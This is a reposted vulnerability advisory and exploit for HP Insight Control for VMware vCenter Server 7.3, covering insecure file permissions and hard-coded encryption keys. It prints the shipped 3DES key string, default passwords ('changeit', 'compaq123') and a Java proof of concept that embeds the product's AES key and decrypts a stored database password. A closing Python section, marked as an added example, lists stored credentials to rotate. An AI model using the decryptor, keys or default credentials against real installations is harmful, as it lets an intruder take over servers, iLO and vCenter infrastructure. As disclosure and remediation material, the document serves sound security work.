HP Insight Control For VMware vCenter Server 7.3 Insecure Permissions Vulnerabil
Source: vfocus.net  Author: Glafkos  Published: 2018-01-02
/*
Exploit Title: HP Insight Control for VMware vCenter Server Multiple Vulnerabilities
Author: Glafkos Charalambous
Version: 7.3
Vendor: HP
Vendor URL: http://www.hpe.com
HP Case: SSRT101619
  
Product Description: HP Insight Control for VMware vCenter Server (Insight Control for vCenter) is a single integrated application that you use to manage ProLiant servers and/or HP storage systems. The application consists of four modules. The core module is required along with at least one of the three optional components.
  
Impact:
A low-privileged attacker can read files holding sensitive information, decrypt all configured server passwords and gain access to the above systems, which in turn leads to the compromise of the whole infrastructure.
  
Vulnerabilities:
  
Local Insecure File Permissions Vulnerability
A local attacker can exploit this issue by gaining access to low privileged readable files and extracting sensitive information.
  
The following file lists the servers configured for the VMware vCenter physical and virtual infrastructure, including IP addresses, usernames and encrypted passwords:
C:\Program Files (x86)\HP\HP Insight Control for vCenter\icvc\hpcs\password.xml
Ex:
  <password>
    <username>Administrator</username>
    <epassword>1Od6BZ6oCIkr5HY*********4F0Za0DJVR3tcDcwA=</epassword>
    <host>172.30.8.101</host>
    <type>Onboard Administrator</type>
    <id>beae31de-fdf8-11e2-9c3e-005056ae52ee</id>
  </password>
  <password>
    <username>root</username>
    <epassword>q75k41lRU+RRQyuk*********QUGjPrB2l6+8VmiW1I=</epassword>
    <host>172.30.8.161</host>
    <type>ProLiant Server</type>
    <id>f0df9f00-fdf8-11e2-bf51-005056ae52ee</id>
  </password>
   <password>
    <username>Administrator</username>
    <epassword>BC6j1QquVE1p*********hLdHMUOfRhcMLoE=</epassword>
    <host>172.30.8.129</host>
    <type>iLO</type>
    <id>f7f0fd0f-0b28-11e3-8753-005056ae52ee</id>
  </password>
  <password>
    <username>vadmin</username>
    <epassword>kbdDWTHKDfx***********49eI93rDL+xRsJu1V8=</epassword>
    <host>172.30.8.198</host>
    <type>vCenter</type>
    <id>d6c21e0f-99f5-11e3-ad68-005056ae52ee</id>
  </password>
    
    
C:\Program Files (x86)\HP\HP Insight Control for vCenter\icvc\uim\config.json
Ex:   
  "db": { // Local Postgres
      "username": "ic4vcdb", 
      "ip": "localhost", 
      "password": "qoelX2yfccmhtDdsHOKAE*********************JXbUFK4ANHoyznp4niXWJzx", 
      "port": "3506"
    }, 
    "vcenters": [
      {
        "username": "vadmin", 
        "ip": "172.30.9.183", 
        "password": "dmNsOek/My2dND7*************/RxgMe/30JJ2nTI="
      }
  
Use of Hard-Coded Cryptographic Keys
Java EE Enterprise Archive (EAR) files contain hard-coded AES-128-CBC and 3DES encryption keys that are used to encrypt configuration files which include password information:
C:\Program Files (x86)\HP\HP Insight Control for vCenter\JBoss\standalone\deployments\app_hpicsm_ear.ear
C:\Program Files (x86)\HP\HP Insight Control for vCenter\JBoss\standalone\deployments\credentialStore_ear.ear
Etc..
  
Files containing Usernames and Encrypted 3DES Passwords (3DES Hardcoded Key: THr@winG s*m3 junk !$$248$#*&^)
C:\Program Files (x86)\HP\HP Insight Control for vCenter\JBoss\standalone\configuration\hp_roles.properties
C:\Program Files (x86)\HP\HP Insight Control for vCenter\JBoss\standalone\configuration\hp_users.properties
C:\Program Files (x86)\HP\HP Insight Control for vCenter\JBoss\standalone\configuration\mgmt-users.properties
  
Use of default Keystore / Certificate Private Key Password
Keystore and PKCS #12 certificate containing private keys using a default password of "changeit"
C:\Program Files (x86)\HP\HP Insight Control for vCenter\JBoss\standalone\configuration\vasa.keystore (Default keystore pass changeit)
C:\Program Files (x86)\HP\HP Insight Control for vCenter\JBoss\standalone\configuration\server.p12 (Default password changeit)
  
Use of Default HP Common Services Password
    <username>compaq</username>
    <epassword>nhEeBy2mlbTbkitvVtAt2E0mnS5SXjCBE3JKtTGKru4=</epassword> = compaq123
    <host>*</host>
    <type>HP Common Services</type>
  
  
PoC AES-128-CBC Password Decryption 
*/
  
import java.security.GeneralSecurityException;
import java.security.Key;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import org.apache.commons.net.util.Base64;
  
  
public class Start {
  
    private static final byte[] IV = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 };
    private static final byte[] KEY = { 116, 111, toUnsigned(155), 34, toUnsigned(240), 47, 126, toUnsigned(157), 19, 33, 75, 32, 26, 27, 122, toUnsigned(134) };
      
    public static void main(String[] args) {
        
      String ePassword = "qoelX2yfccmhtDdsHOKAE2W8R82buPd6jQX6AlqJ6JXbUFK4ANHoyznp4niXWJzx";
      String decryptedPassword = decrypt(ePassword);
      System.out.println("Password is: " + decryptedPassword);
  
      }
      
    public static String decrypt(String encryptedString)
    {
      try
      {
        Cipher cipher = Cipher.getInstance("AES/CBC/NoPadding");
        Key key = new SecretKeySpec(KEY, 0, KEY.length, "AES");
        IvParameterSpec iv = new IvParameterSpec(IV, 0, IV.length);
        cipher.init(Cipher.DECRYPT_MODE, key, iv);
        byte[] encryptedBytes = Base64.decodeBase64(encryptedString.getBytes());
          
        // Decrypt the whole buffer in one call.
        byte[] decryptedBytes = cipher.doFinal(encryptedBytes);
        // The first 16-byte block is not part of the password and is skipped.
        String decryptedString = new String(decryptedBytes, 16, decryptedBytes.length - 16);
        // NoPadding leaves the padding bytes in place; trim() drops them.
        return decryptedString.trim();
          
      }
      catch (GeneralSecurityException e)
      {
        System.out.println("Password Decryption Error");
      }
      return null;
    }
      
    private static final byte toUnsigned(int value)
    {
      if (value < 128) {
        return (byte)value;
      }
      return (byte)(value - 256);
    }
      
}
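
Because the key ships with the product and password.xml is readable by low-privileged users, every credential stored in that file has to be treated as exposed and rotated. The following is an added example, not part of the original advisory or of HP's code: it builds a rotation inventory from a file in the password.xml layout quoted above without touching the encrypted values. The `<passwords>` root element, the function name `rotation_inventory` and all sample values are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the password.xml layout quoted above. The <passwords>
# root element, hosts and epassword blobs are assumptions, not real data.
SAMPLE_XML = """<passwords>
  <password><username>Administrator</username><epassword>Q09OU1RSVUNURUQx</epassword>
    <host>192.0.2.10</host><type>iLO</type><id>constructed-1</id></password>
  <password><username>vadmin</username><epassword>Q09OU1RSVUNURUQy</epassword>
    <host>192.0.2.20</host><type>vCenter</type><id>constructed-2</id></password>
  <password><username>compaq</username><epassword>Q09OU1RSVUNURUQz</epassword>
    <host>*</host><type>HP Common Services</type><id>constructed-3</id></password>
  <password><username>root</username><epassword></epassword>
    <host>192.0.2.30</host><type>ProLiant Server</type><id>constructed-4</id></password>
</passwords>"""


def rotation_inventory(xml_text):
    """List every stored credential that must be rotated, highest priority first.

    Any entry with a non-empty <epassword> counts as exposed, because the file
    is readable by low-privileged users and the key ships with the product.
    The encrypted value itself is never copied into the result.
    """
    findings = []
    for node in ET.fromstring(xml_text).iter("password"):
        entry = {field: (node.findtext(field) or "").strip()
                 for field in ("username", "host", "type", "epassword")}
        if not entry["epassword"]:
            continue  # nothing stored, nothing to rotate
        reasons = ["stored-credential"]
        if entry["host"] == "*":
            reasons.append("wildcard-host")    # entry applies to every managed host
        if entry["username"] == "compaq" and entry["type"] == "HP Common Services":
            reasons.append("default-account")  # default account named in the advisory
        findings.append({"account": entry["username"], "host": entry["host"],
                         "type": entry["type"], "reasons": reasons})
    # Entries with more reasons come first, then a stable order by type and host.
    findings.sort(key=lambda item: (-len(item["reasons"]), item["type"], item["host"]))
    return findings


if __name__ == "__main__":
    for item in rotation_inventory(SAMPLE_XML):
        print(f'{item["type"]:<20} {item["account"]}@{item["host"]:<12} '
              f'{",".join(item["reasons"])}')
```

Run it against a copy of the real file from an administrative account, and rotate the listed credentials on the target systems themselves, since re-encrypting them with the same shipped key changes nothing.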

 